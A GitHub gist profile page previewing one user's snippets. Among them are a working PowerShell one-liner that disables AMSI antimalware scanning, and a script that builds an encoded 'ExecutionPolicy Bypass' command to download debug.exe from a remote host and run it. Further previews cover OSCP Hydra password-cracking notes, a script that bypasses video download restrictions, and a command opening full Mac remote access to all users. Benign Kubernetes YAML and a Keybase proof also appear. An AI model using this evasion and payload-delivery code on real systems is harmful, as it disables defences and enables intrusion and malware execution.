Skip to content

Instantly share code, notes, and snippets.

View ressl's full-sized avatar

Robert Ressl ressl

5 followers · 9 following
View GitHub Profile
@ressl
ressl / PSAmsiBypass.md
Created February 5, 2023 10:59 — forked from Gr1mmie/PSAmsiBypass.md

AMSI-No-More (Courtesy of PS)

$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)

This oneliner can be used to effectively disable AMSI running in your current session by essentially corrupting the current AMSI session(a session is created when any process is run so what we are doing is killing it in our current process).

How it works

@ressl
ressl / encode_cmd.ps1
Last active February 5, 2023 10:50
PowerShell script to encode command and set to clipboard
$remoteHost = '192.168.108.1'
$remoteFile = 'debug.exe'
$destSource = 'C:\Users\Public\debug.exe'
$psInject = "Invoke-WebRequest -Uri http://$remoteHost/$remoteFile -Outfile $destSource; $destSource"
$encInject = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($psInject))
$executeCMD = 'powershell -ExecutionPolicy Bypass -enc ' + $encInject
Write-Host $executeCMD
@ressl
ressl / download.js
Created February 4, 2023 17:53
Yamaha Music School Download Video and Music offline
//video
// enable video download
$('video').removeAttr('controlsList');
var videofiles = document.getElementsByTagName('video');
var videotext = document.getElementsByClassName('icon');
var srcList = [];
var i = 0;
@ressl
ressl / OSCP_Password_Cracking.md
Created May 14, 2022 19:46 — forked from ssstonebraker/OSCP_Password_Cracking.md

Hydra

Supported protocols

List1 list2 list3 list4 list5
asterisk icq oracle-listener rexec snmp
cisco imap[s] oracle-sid rlogin socks5
cisco-enable irc pcanywhere rpcap ssh
@ressl
ressl / gist:41a8b9c157946d2b1c07242e9e55d4f5
Created September 3, 2021 09:15 — forked from nateware/gist:3915757
Start Mac VNC server from command line
# Step 1: Set priveleges
$ sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -configure -allowAccessFor -allUsers -privs -all
Starting...
Setting allow all users to YES.
Setting all users privileges to 1073742079.
Done.
# Step 2: Allow VNC clients
@ressl
ressl / gist:18f1dc20c694555200845f3db17aa32a
Created December 17, 2019 10:49
apiVerison: v1
kind: Service
metadata:
name: nginx-nodeport
spec:
type: NodePort
ports:
- protocol: TCP
port: 80
targetPort: 80
@ressl
ressl / busyboxplus
Created December 17, 2019 10:41
apiVersion: v1
kind: Pod
metadata:
name: busybox
spec:
containers:
- name: busybox
image: radial/busyboxplus:curl
args:
- sleep
@ressl
ressl / nginx
Created December 17, 2019 10:26
apiVersion: apps/v1
kind: Deployment
metadata:
name: nginx
labels:
app: nginx
spec:
replicas: 2
selector:
matchLabels:
@ressl
ressl / redhat_centos-kubernetes.repo
Last active December 17, 2019 09:45
[kubernetes]
name=Kubernetes
baseurl=https://packages.cloud.google.com/yum/repos/kubernetes-el7-x86_64
enabled=1
gpgcheck=1
repo_gpgcheck=1
gpgkey=https://packages.cloud.google.com/yum/doc/yum-key.gpg https://packages.cloud.google.com/yum/doc/rpm-package-key.gpg
@ressl
ressl / keybase.md
Last active January 14, 2021 16:38

Keybase proof

I hereby claim:

  • I am ressl on github.
  • I am rressl (https://keybase.io/rressl) on keybase.
  • I have a public key ASAI_AuetlYYEnfHI-wEXDLg6jShxX01XzW6SHr3Ukinego

To claim this, I am signing this object: